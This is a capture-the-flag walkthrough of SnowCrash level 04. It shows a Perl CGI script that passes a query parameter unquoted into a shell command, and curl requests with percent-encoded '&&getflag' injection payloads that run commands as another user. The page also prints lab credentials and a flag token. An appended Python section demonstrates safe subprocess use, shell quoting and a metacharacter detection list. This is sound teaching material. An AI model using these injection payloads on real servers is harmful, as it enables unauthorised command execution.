# Level 04

## how to login

username: level04
password: qi0maab88jeaj46qoumi7maus

## Goal

run `getflag` as user `flag04`

## Actually doing something

```bash
level04@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level04 level04  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level04 level04  220 Apr  3  2012 .bash_logout*
-r-x------  1 level04 level04 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl*
-r-x------  1 level04 level04  675 Apr  3  2012 .profile*
```

Hmmm, `.pl`. Let's dig out the dinosaur and have fun with some Perl.

```perl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  # $y is interpolated, unquoted, straight into a shell command
  print `echo $y 2>&1`;
}
x(param("x"));
```

This reeks of exploit.

As I understand it, this script is used by the HTTP server on localhost:4747: on a request it takes the parameter `x` and returns it. The issue is how it returns it... It forwards it to a shell command string and prints the result. This is as secure as having a literal endpoint that takes a command and returns its output. Why? Because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo` command we can run whatever we want, for example `getflag`.

We want this

```perl
print `echo $y 2>&1`
```

to become

```perl
print `echo idk && getflag 2>&1`
```

We are in a shell, so we can remove the spaces around the `&&`, meaning that `x` must be equal to `idk&&getflag`. But if we do it dumbly, nothing happens:

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
idk
```

Why? Because `&` has a special meaning in URLs: it separates query arguments. We need to escape it. How? The standard says to use percent-encoding. Reading a bit more, it says that `%26` is the escape code for `&`. Let's replace it to get `idk%26%26getflag`, and voila!

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
GetExploited
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```

Let's have a bit more fun. Since we have access to the machine itself, we can create a file somewhere and run it by giving its path:

```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
idk
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```

Look mom, I recycle my stuff!
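To show the two halves of what happens above (the query parser swallowing a raw `&`, and the shell interpreting `&&`), here is an added example in Python, not code from the level or from SnowCrash. It parses the query string the way the server does and then runs `echo` the safe way, without a shell, so the same `idk&&getflag` value comes back as plain text instead of running a second command; the metacharacter check is one a reviewer could use to flag such inputs in logs.

```python
import shlex
import subprocess
from urllib.parse import parse_qs

# Characters that let an argument "leave" a shell command (constructed list).
SHELL_METACHARS = set("&;|`$<>(){}\n")


def param_x(query):
    """Return the x parameter as a CGI parser would decode it.

    A raw '&' splits the query, so 'x=idk&&getflag' yields only 'idk';
    the percent-encoded 'x=idk%26%26getflag' yields 'idk&&getflag'.
    """
    return parse_qs(query).get("x", [""])[0]


def echo_safe(value):
    """Hardened version: argv list, no shell, so '&&' is just bytes."""
    result = subprocess.run(["echo", value], capture_output=True, text=True)
    return result.stdout


def echo_quoted(value):
    """If a shell is unavoidable, quote the argument before interpolating."""
    cmd = "echo " + shlex.quote(value)
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def has_shell_metachars(value):
    """Detection helper: True when a decoded parameter contains shell syntax."""
    return any(ch in SHELL_METACHARS for ch in value)


if __name__ == "__main__":
    for q in ("x=idk&&getflag", "x=idk%26%26getflag"):
        x = param_x(q)
        print(f"{q!r} -> x={x!r} suspicious={has_shell_metachars(x)}")
        print("  no-shell output:", echo_safe(x).rstrip())
        print("  quoted   output:", echo_quoted(x).rstrip())
```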